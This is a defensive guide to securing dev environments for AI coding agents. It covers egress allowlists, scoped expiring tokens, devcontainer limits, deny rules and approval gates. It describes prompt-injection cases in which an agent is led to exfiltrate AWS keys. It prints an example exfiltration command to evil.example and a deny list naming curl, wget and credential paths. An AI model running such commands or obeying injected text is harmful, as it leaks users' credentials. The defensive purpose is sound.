Securing a dev environment for an AI coding agent comes down to one assumption: treat the agent as an untrusted intern with your shell. It is useful, fast, and occasionally talked into doing something stupid by text it read in a file, an issue comment, or a web page. A successful prompt injection does not produce a rude sentence; it produces an action: a curl with your ~/.aws credentials in the body, a git push of a branch you never reviewed, a tool call that uses an API key it was never supposed to touch. The control that survives all of that is not the model. It is the environment.
Anthropic put the principle bluntly in its May 2026 post How we contain Claude, after an attacker phished an employee into running Claude Code with instructions to exfiltrate AWS keys: "the only defense that holds… is the environment, specifically egress controls that block the POST regardless of intent and filesystem boundaries that keep ~/.aws out of reach in the first place." This guide is the practical version of that sentence — scoped keys, locked-down Docker egress, devcontainer caveats, and how to hand secrets around without leaving a copy where an agent can read it.
TL;DR
- Egress control is the one defense to set up first. If the agent cannot POST to an arbitrary host, the stolen secret has nowhere to go — block outbound traffic except an allowlist.
- A devcontainer is isolation, not a complete boundary. Anthropic's own docs warn that with --dangerously-skip-permissions it "does not prevent a malicious project from exfiltrating anything accessible inside the container."
- Scope keys to the task, not the operator. Prefer short-lived, narrowly scoped tokens; the agent should never hold a credential broader than the job in front of it.
- Never mount host secrets. Keep ~/.ssh and cloud credential files out of the container; pass repository-scoped or expiring tokens instead.
- Least privilege bounds the blast radius; it does not stop injection. Pair it with deny rules, runtime approval for risky actions, and monitoring.
What is the actual threat from an AI coding agent?
The structural problem is the confused deputy: the agent acts on your behalf and carries your privileges — API keys, a logged-in gh, a cloud credential chain — while taking instructions from text it cannot fully trust. OWASP ranks prompt injection as LLM01, the number-one risk for LLM applications, precisely because the injected instruction borrows the deputy's permissions. The blast radius is whatever the agent can reach: every tool loaded into its context is a callable endpoint, and every readable secret is a candidate for exfiltration.
Two things make this concrete rather than hypothetical. First, the injection source is rarely the user — it is a dependency's README, a GitHub issue the agent was asked to triage, a web page it fetched, or a poisoned MCP tool description. Second, the harm is a normal-looking action. Anthropic's containment team describes the case where the user themselves was the injection vector — phished into pasting malicious instructions — and notes that model-layer defenses cannot help once the human in the loop is the one being manipulated. That is the moment the environment has to catch it.
Why isn't a devcontainer a complete security boundary?
A dev container is the right baseline — it runs the agent as a non-root user, confines command execution to the container, and keeps your host toolchain out of reach. It is genuinely useful isolation. It is not a sandbox you can hand an untrusted repo and walk away from.
Anthropic's dev container documentation states the limit directly: run Claude Code with --dangerously-skip-permissions and the container "does not prevent a malicious project from exfiltrating anything accessible inside the container, including the Claude Code credentials stored in ~/.claude." The same page gives the two rules that matter most:
- Only develop trusted repositories this way, and monitor what the agent does — the container shrinks the blast radius, it does not neutralise a hostile project.
- Never mount host secrets. Keep ~/.ssh and cloud credential files on the host; pass repository-scoped or short-lived tokens through containerEnv or a secrets store instead. A credential you mount is a credential the agent, and anything that injects it, can read.
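The no-host-secrets rule is easy to check mechanically before a container ever starts. The following is a minimal sketch, assuming the configuration has already been parsed into a dict (real devcontainer.json files may contain comments, which plain JSON parsing rejects). The marker list and the function names `mount_source` and `find_secret_mounts` are illustrative, not part of any tool.

```python
import json

# Host paths that should never be bind-mounted into an agent container.
# The list is illustrative; extend it for your own credential locations.
SECRET_PATH_MARKERS = ("/.ssh", "/.aws", "/.config/gcloud", "/.kube", "/.gnupg")


def mount_source(mount) -> str:
    """Return the host-side source of a devcontainer mount entry.

    Mount entries can be objects or comma-separated "key=value" strings.
    """
    if isinstance(mount, dict):
        return str(mount.get("source", ""))
    for part in str(mount).split(","):
        key, _, value = part.partition("=")
        if key.strip() in ("source", "src"):
            return value.strip()
    return ""


def find_secret_mounts(config: dict) -> list[str]:
    """List mount sources that point at a known host secret location."""
    flagged = []
    for mount in config.get("mounts", []):
        source = mount_source(mount)
        if any(marker in source for marker in SECRET_PATH_MARKERS):
            flagged.append(source)
    return flagged


if __name__ == "__main__":
    # Hypothetical config: one bad bind mount, one harmless named volume.
    example = json.loads("""
    {
      "mounts": [
        "source=${localEnv:HOME}/.ssh,target=/home/node/.ssh,type=bind",
        {"source": "shell-history", "target": "/commandhistory", "type": "volume"}
      ]
    }
    """)
    for source in find_secret_mounts(example):
        print(f"refuse to start: host secret mounted from {source}")
```

A check like this belongs in CI or a pre-start hook, outside the agent's reach, so a hostile repository cannot quietly add the mount back.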
How do I scope and expire API keys for an agent?
The rule that comes out of every agent-security writeup: scope permissions to the task, not to the operator's role. A human engineer might have read-write on the whole database; an agent running a report needs SELECT on two tables and nothing else, enforced at the engine, not requested politely in a prompt. The same logic applies to every key you hand it. See the environment variable security guide for the full secrets hierarchy and rotation playbook, and environment variable best practices for least-privilege defaults.
Three patterns, from weakest to strongest:
| Pattern | What it does | Why it limits exfiltration |
|---|---|---|
| Scoped key | One key per task, minimum permissions, separate per environment. | A leaked key buys the attacker only what that task could already do. |
| Short-lived token | Mint on demand, expire in minutes (OIDC, STS, gh app tokens). | A stolen token is often dead before the attacker can use it. |
| Credential never reaches the agent | A proxy outside the agent's trust boundary injects the key into requests. | There is no secret in the agent's environment to exfiltrate at all. |
Anthropic ships the first two patterns in its own product surface: Claude Code's Remote Control uses "multiple short-lived, narrowly scoped credentials, each limited to a specific purpose and expiring independently, to limit the blast radius of any single compromised credential." You can apply a cheaper version today: keep the long-lived key in your CI secret store or a vault, hand the agent an expiring token, and rotate aggressively. A key that lives in a plaintext .env for six months is the worst case; a token that dies in fifteen minutes is the goal.
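To make "scoped and short-lived" concrete, here is a toy token broker, sketched under loud assumptions: it is not how OIDC, STS, or GitHub App tokens work internally, and `BROKER_KEY`, `mint_token`, and `authorize` are hypothetical names. It only shows the two checks that matter on every request: is the token still alive, and does it cover this action.

```python
import hashlib
import hmac
import json
import time
from base64 import urlsafe_b64decode, urlsafe_b64encode
from typing import Optional

# Hypothetical signing key; in practice it lives in a vault or CI secret
# store, outside anything the agent can read.
BROKER_KEY = b"replace-me-and-keep-me-outside-the-agent"


def mint_token(scopes: list[str], ttl_seconds: int, now: Optional[float] = None) -> str:
    """Issue a token limited to `scopes` that expires after `ttl_seconds`."""
    issued = time.time() if now is None else now
    claims = {"scopes": sorted(scopes), "exp": issued + ttl_seconds}
    payload = urlsafe_b64encode(json.dumps(claims).encode())
    signature = hmac.new(BROKER_KEY, payload, hashlib.sha256).hexdigest()
    return f"{payload.decode()}.{signature}"


def authorize(token: str, needed_scope: str, now: Optional[float] = None) -> bool:
    """Accept the token only if it is authentic, unexpired, and in scope."""
    payload, _, signature = token.partition(".")
    expected = hmac.new(BROKER_KEY, payload.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(signature.encode(), expected.encode()):
        return False  # forged or tampered token
    claims = json.loads(urlsafe_b64decode(payload.encode()))
    current = time.time() if now is None else now
    return current < claims["exp"] and needed_scope in claims["scopes"]


if __name__ == "__main__":
    # A fifteen-minute, read-only token for a reporting task.
    token = mint_token(["reports:read"], ttl_seconds=900, now=0)
    print(authorize(token, "reports:read", now=60))    # within scope and lifetime
    print(authorize(token, "reports:write", now=60))   # outside the task's scope
    print(authorize(token, "reports:read", now=901))   # after expiry
```

The design point is that both checks run on the service side. The agent holds only the token, so a stolen copy is limited to one scope and a short window.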
How do I lock down Docker egress and the filesystem?
Egress control is the defense that holds when everything else fails, because exfiltration needs a network path out. Anthropic's reference dev container ships an init-firewall.sh that blocks all outbound traffic except the domains the agent and your tools actually need — model inference, source control, package registries, telemetry. Everything else is dropped, so a coerced curl https://evil.example/?key=$AWS_SECRET simply never connects.
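The allowlist decision itself is small enough to sketch. This is not the logic of init-firewall.sh; it is an illustrative default-deny check, with hypothetical hosts in `ALLOWED_HOSTS`, that shows why lookalike hostnames and embedded credentials in a URL should not slip through. Real enforcement belongs in the firewall or proxy, outside the agent's process.

```python
from urllib.parse import urlsplit

# Illustrative allowlist; the real entries depend on your tools.
ALLOWED_HOSTS = {"api.anthropic.com", "github.com", "registry.npmjs.org"}


def is_egress_allowed(url: str, allowed_hosts: set[str] = ALLOWED_HOSTS) -> bool:
    """Default-deny: allow only exact hostname matches on the allowlist."""
    host = urlsplit(url).hostname  # already lowercased; None if no authority
    if host is None:
        return False
    return host.rstrip(".") in allowed_hosts


if __name__ == "__main__":
    for url in (
        "https://github.com/org/repo.git",
        "https://evil.example/?key=abc",
        "https://github.com.evil.example/",   # lookalike suffix
        "https://github.com@evil.example/",   # userinfo trick
    ):
        print(url, "->", "allow" if is_egress_allowed(url) else "drop")
```

Exact matching is deliberately stricter than suffix or wildcard matching: every subdomain you need has to be listed, which keeps the allowlist auditable.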
Pair that with two filesystem and permission controls. Claude Code restricts writes to the working directory and its subfolders by default, and its built-in sandbox (bubblewrap on Linux, seatbelt on macOS) enforces filesystem and network isolation on Bash — Anthropic reports it cut permission prompts by 84% in internal use precisely because the boundary, not a human click, is doing the work. On top of that, deny rules are a cheap, explicit backstop:
    {
      "permissions": {
        "deny": [
          "Read(./secrets/**)",
          "Read(./.env)",
          "Read(~/.aws/**)",
          "Read(~/.ssh/**)",
          "Bash(curl:*)",
          "Bash(wget:*)",
          "WebFetch"
        ]
      }
    }

One honest caveat from Anthropic's docs: curl and wget are already not auto-approved, but a deny rule is what makes the block unconditional. And a TLS-terminating proxy is the only way to inspect or strip credentials from HTTPS traffic; a plain HTTP_PROXY sees an opaque tunnel, not the request body. For anything you truly do not trust, the strongest answer in the security docs is still a disposable VM.
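Deny rules only help if they stay in the settings file, and a hostile pull request can remove them. A small drift check, sketched here with a hypothetical `missing_deny_rules` helper and a required set copied from the deny list above, can fail a CI job when a rule disappears. It takes the settings text as input, so it makes no assumption about where your settings file lives.

```python
import json

# Rules this sketch treats as mandatory; taken from the deny list above.
REQUIRED_DENY = {
    "Read(./.env)",
    "Read(~/.aws/**)",
    "Read(~/.ssh/**)",
    "Bash(curl:*)",
    "Bash(wget:*)",
}


def missing_deny_rules(settings_text: str, required: set[str] = REQUIRED_DENY) -> list[str]:
    """Return required deny rules absent from a settings JSON document."""
    settings = json.loads(settings_text)
    present = set(settings.get("permissions", {}).get("deny", []))
    return sorted(required - present)


if __name__ == "__main__":
    # Hypothetical settings that lost most of their deny rules.
    weakened = '{"permissions": {"deny": ["Read(./.env)", "Bash(curl:*)"]}}'
    for rule in missing_deny_rules(weakened):
        print(f"missing deny rule: {rule}")
```

The comparison is an exact string match, so it detects removal, not equivalence. A rule rewritten in a different but equally strict form would be reported as missing, which is the safer failure mode.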
How do I share secrets without leaving a copy?
Onboarding and credential handoff are where secrets leak by habit — pasted into Slack, emailed, dropped in a ticket, then sitting in a searchable archive forever, readable by any agent later pointed at that history. Use a zero-knowledge, burn-on-first-read channel instead. That is exactly what send.env.dev is for: the payload is encrypted in the browser, the server never sees the plaintext, and the link self-destructs after one open. The sharing .env files securely guide covers the full workflow and how it compares to 1Password, Doppler, and SOPS. The rule of thumb: a secret that exists in exactly one place for exactly one read cannot be scraped from a chat log.
A hardening checklist for AI-assisted development
Run an agent against work you do not fully trust only when every line below is true. Most of these are one-time setup; the payoff is that a single bad instruction stays contained.
- Non-root user, working directory only. The agent writes to the repo bind-mount and nothing above it.
- No host secrets mounted. No ~/.ssh, no ~/.aws, no cloud credential files; repository-scoped or expiring tokens only.
- Egress allowlist. Outbound blocked except inference, source control, registries, and telemetry.
- Deny rules for secrets and network shells. Block reads of secret paths and unconditioned curl/wget.
- Human-in-the-loop for high-risk actions. Deletes, deploys, infra changes, and pushes to main require explicit approval.
- No unattended push to production. A non-interactive job must not push to main, publish packages, apply infra, or run migrations without a separate approval path.
- Monitoring and audit. Log tool calls and watch for anomalous network or filesystem activity; observability is the OWASP control most teams skip.
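The human-in-the-loop items on the checklist can be approximated with a gate that sits between the agent and the shell. The sketch below is a rough backstop under stated assumptions: the patterns in `HIGH_RISK_PATTERNS` are illustrative, the function names are hypothetical, and string matching is easy to evade (a command wrapped in `sh -c`, or a bare `git push` from a checked-out main). Branch protection and deploy approvals on the server side remain the real control.

```python
import re

# Illustrative patterns for actions that should wait for a human.
HIGH_RISK_PATTERNS = [
    re.compile(r"^git push\b.*\b(main|master)\b"),   # pushes naming a protected branch
    re.compile(r"^(npm|pnpm|yarn) publish\b"),       # package publishing
    re.compile(r"^terraform (apply|destroy)\b"),     # infrastructure changes
    re.compile(r"^rm\s+-\w*r"),                      # recursive deletes
]


def requires_approval(command: str) -> bool:
    """Return True when the command matches a high-risk pattern."""
    normalized = " ".join(command.split())  # collapse runs of whitespace
    return any(pattern.search(normalized) for pattern in HIGH_RISK_PATTERNS)


def gate(command: str, approved: bool = False) -> str:
    """Decide whether a command may run without a separate approval."""
    if requires_approval(command) and not approved:
        return "blocked: needs explicit approval"
    return "allowed"


if __name__ == "__main__":
    for cmd in ("npm test", "git push origin main", "terraform apply -auto-approve"):
        print(f"{cmd!r}: {gate(cmd)}")
```

The gate errs toward over-blocking: a branch named feature/main-fix also triggers the push rule, which costs one extra approval and no security.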
When does this approach fall short?
- Scoped keys do not stop injection — they cap it. An injected instruction that stays inside the agent's allowed scope still executes. Least privilege shrinks the damage; it does not prevent the act.
- Containers are isolation, not a verdict. A privileged process outside the sandbox decides per-command whether to enforce it, and a persuasive injected prompt or a fatigued approval click can still get something through. Use a disposable VM for genuinely hostile input.
- An allowlist is only as tight as its entries. If your egress allowlist includes a host an attacker can write to — a public gist, a webhook tester, your own telemetry sink — exfiltration has a road out. Audit the allowlist like you audit IAM.
- Defense-in-depth or nothing. No single layer is sufficient. Runtime authorization that lives outside the model's reasoning loop, input validation, and monitoring are the rest of the stack — the OWASP cheat sheet lists nine controls for a reason.
Related reading on env.dev
- Dark Factory: security & governance — the OWASP Agentic Top 10, audit trails, and settings governance for autonomous agents.
- Dev containers — the full devcontainer.json, features, and hardening setup the isolation baseline rests on.
- Sharing .env files securely — zero-knowledge handoff with send.env.dev versus vaults and SOPS.
- Environment variable security — secrets hierarchy, leak detection, rotation, and incident response.
Primary sources
- Anthropic: How we contain Claude (May 2026; the egress-and-filesystem "defense that holds" framing and the user-as-injection-vector incident).
- Anthropic: Claude Code sandboxing (filesystem + network isolation, bubblewrap/seatbelt, the 84% prompt reduction).
- Claude Code: Development containers (the "not a complete boundary" warning, no-host-secrets rule, init-firewall.sh).
- Claude Code: Security (read-only default, deny rules, network-command approval, scoped short-lived credentials).
- OWASP: AI Agent Security Cheat Sheet (least privilege, tool scoping, runtime authorization, human-in-the-loop, monitoring).